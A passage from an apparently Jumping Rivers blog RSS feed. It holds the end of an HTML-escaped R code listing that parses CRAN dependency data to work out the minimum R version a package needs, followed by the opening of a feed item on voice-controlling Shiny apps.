&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;separate&lt;/span&gt;(pkg, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\(&amp;#34;&lt;/span&gt;, into &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;right&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(version, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\)&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(package, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\)&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(version, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\n&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(package, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\n&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_trim&lt;/span&gt;(version),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_trim&lt;/span&gt;(package)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;## Detect where version is&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; version_loc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_locate&lt;/span&gt;(av_clean&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;version, &lt;span style="color:#a5d6ff"&gt;&amp;#34;[0-9]&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_clean &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(condition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_sub&lt;/span&gt;(version, end &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; version_loc[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;end&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_sub&lt;/span&gt;(version, start &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; version_loc[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;end&amp;#34;&lt;/span&gt;])) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; package,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; version,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; depend_condition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; condition) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(depend_condition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_trim&lt;/span&gt;(depend_condition))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
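&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Pad two-part versions such as 3.1 to three parts (3.1.0); NAs are left alone&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;clean_r_ver &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(vers) {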
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nas &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(vers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vers[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;nas] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(vers[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;nas], &lt;span style="color:#d2a8ff;font-weight:bold"&gt;if_else&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_count&lt;/span&gt;(vers[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;nas], &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;.0&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vers
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
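&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Return the largest version from a character vector of x.y.z strings&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;max_r_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(r_versions) {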
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_split&lt;/span&gt;(r_versions, &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.&amp;#34;&lt;/span&gt;, n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; major &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(s, `[`, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(as.integer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;## Find the highest major version present; only 3, 2 and 1 are checked&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; minor &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(s, `[`, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(as.integer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; minor&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; maj_number)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; third &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(s, `[`, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(as.integer)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; third_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; third&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[which&lt;/span&gt;(major &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; maj_number &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; minor &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; min_number)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{maj_number}.{min_number}.{third_number}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_r_ver &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(pkg, clean_av) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; clean_av &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; pkg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(depend_version) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(r_cur) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkg_dep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;package_dependencies&lt;/span&gt;(pkg,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; which &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unname&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(pkg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Optional and recommended packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; with_r &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(av_pkgs, &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(priority)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkg_dep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pkg_dep[&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;(pkg_dep &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; with_r)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r_ver &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; clean_av &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; pkg_dep) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;R&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(depend_version) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;max_r_version&lt;/span&gt;(depend_version)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; clean_av &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; pkg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(r_real &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.character&lt;/span&gt;(r_ver),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; r_cur)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/what-r-version-do-you-really-need-for-a-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Voice Control your Shiny Apps</title><link>https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/</link><pubDate>Mon, 15 Oct 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
